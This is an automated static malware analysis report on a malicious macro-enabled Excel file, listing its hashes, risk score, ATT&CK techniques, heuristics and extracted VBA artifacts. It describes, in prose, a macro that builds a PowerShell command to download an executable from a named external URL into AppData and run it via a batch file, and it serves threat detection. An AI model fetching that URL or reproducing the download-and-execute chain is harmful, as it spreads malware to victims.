Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 b087016bd7f2e4a1…

MALICIOUS

Office (OOXML) / .XLSM

52.2 KB Created: 2022-01-04 14:07:30 UTC Authoring application: Microsoft Excel 15.0300
MD5: b82b69824a1423b3b74575f9f3abfce8 SHA-1: f9973cca44a67e6675618c9c727841794b34f550 SHA-256: b087016bd7f2e4a1689771ccd10f3b73ca36c93b42cbf3a559188e5c90b018f4
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell

The critical heuristic OLE_VBA_SHELL indicates the presence of a Shell() call within the VBA macros. The VBA script reconstructs a PowerShell command to download a file from 'http://ddl7.data.hu/get/21270/1316926/doga.exe' and save it as 'Euwzls.exe' in the user's AppData directory, then executes it. It also creates a batch file named 'Leqnofqpmogxuxnwtrmql.bat' to execute this payload.

Heuristics 2

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • VBA project inside OOXML medium OOXML_VBA
    Document contains vbaProject.bin — VBA macros present

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
4bb26084347e8606d2b23d7ed53b80342d1c160c02ed01c0ef8cccba62d9b31a		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2320 bytes
vbaProject_00.bin
ff349aa8dc571b7cd1a2318493e8d70c8c52c01121b4eba7836d7dfbd0830939		 vba-project OOXML VBA project: xl/vbaProject.bin 6144 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.